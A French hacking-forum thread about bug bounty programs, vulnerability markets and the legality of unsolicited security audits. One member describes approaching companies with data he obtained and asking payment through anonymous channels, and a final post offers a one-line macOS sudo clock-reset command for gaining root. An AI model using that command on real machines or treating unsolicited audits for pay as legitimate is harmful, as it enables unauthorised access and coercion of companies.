Être payé pour trouver des failles

[Di0Sasm]

Je re-link jamais de liens venant d'autres forums, mais celui-là il pourrait en intéresser plusieurs,(habituellement je ne le fais jamais) mais s'il y'en qui ont besoin d'argent (même les autres) tout en restant White-Hat c'est le moment pour vous de faire voir vos connaissances acquises et les mettre en exploitation pour la bonne cause et j'insiste en étant payé.


Le liens http://www.rafayhackingarticles.net/2012...s-and.html



Source:Linux-Track

[LR-6]

Pour PayPal apparement ça ne vaut pas le coup: http://www.reddit.com/r/netsec/comments/...nt_bother/

[Di0Sasm]

Sauf si tu bosse directement sur www.paypal.com,fr,de, etc.., là ils prennent en compte.

[st0rm3]

C'est génial merci beaucoup je pense que je vais me mettre en mode pentest chez google ^^

[LeuhVa]

Y'a des belles rewards quand même
Je me souviens d'un certains blwood.net,qui avait réussi à trouver une faille upload sur skyblog(y'a qqes années,oui) et qu'avait pas toucher un copec il me semble ...

[Ekroz]

Je trouve l'idée intéressante. Ce qui attire les gens à pirater c'est souvent l'appât du gain (et également pour flatter l'égo).
Proposer de l'argent pour trouver des failles c'est encourager plus de monde à ne pas tout casser.

[ﮎyиthﮎtyℓє]

Proposer de l'argent pour trouver des failles c'est encourager plus de monde à ne pas tout casser.

oui et non, c'est à double tranchant, a combien estime tu ta sécurité et a combien ton ennemi estime ta sécurité ?

[Ted]

Il m'est déjà arrivée de contacter des entreprises en leurs exposant les différentes infos que j'ai pue récupérée et en leur proposant un rapport détaillé.
Mais il faut bien sur utiliser des système de paiement anonyme car il existe des histoires où le pentesteur ce fait prendre au piège.

[ﮎyиthﮎtyℓє]

Je ne croit pas qu'être payé en bitcoin (ou autre payement anonyme) sera en ta faveur dans ce cas la si il y a une plainte de déposé.
tu leur montre le mails comme quoi il t’on autorisé à audité leur appli et voilà, dans les dents, ils peuvent plus rien.
Sinon pareil, si vous contacté des entreprises pour des vulnérabilités, ne leur dites jamais 'j'ai trouvé des failles'
Passé par un discoure du genre, 'je pense que votre site est vulnérable et ce que je peut essayé quelques chose'
L'audit sauvage c'est illégale.

[Ted]

Tous a fait d'accord avec toi, seulement la plupart du temps que tu passe par un discours comme ton dernier, aucune réponse n'est faite ou l'email n'est pas pris en compte.

Après je serai une entreprise et l'on m'exposerai différentes données et l'on me proposerai de me les exposée pour ainsi les corriger je pense que je serai de bonne grâce mais d'après certaine histoire ce n'est pas toujours le cas.

[ﮎyиthﮎtyℓє]

ça c'est ton point de vue, quand j'envoi un email, en générale j'ai une réponse (quelle soit positive ou négative)

[gruik]

bon en même temps les concours d'ignorance c'est pas hyper intéressant non plus, déjà le dernier post datait de mai dernier mais celui d'avant datait de l'année dernière, déterrer un post useless pour l'alimenter...

y'a des marchés pour les failles, que ce soit des boites comme vupen qui vendent leurs 0days au gouvernement et aux entreprises, les entreprises elles mêmes qui appâtent les hackers les plus débiles avec quelques billets ou les blackmarkets russes où pour tout botnet acheté un rein d'enfant de 8 ans est offert en cadeau

les questions de pognon je vous dirais qu'on s'en fout sur n-pn, on est pas des commerciaux ou des marchands de tapis, on préfère en général parler informatique et technique, donc ne vous privez surtout pas...

[ﮎyиthﮎtyℓє]

ne crache jamais sur l'argent.
edit:
also: http://rt.com/news/facebook-post-exploit...rberg-621/

[infierno]

Envie de passer root sur MacOS ?

sudo -k;systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su

[gruik]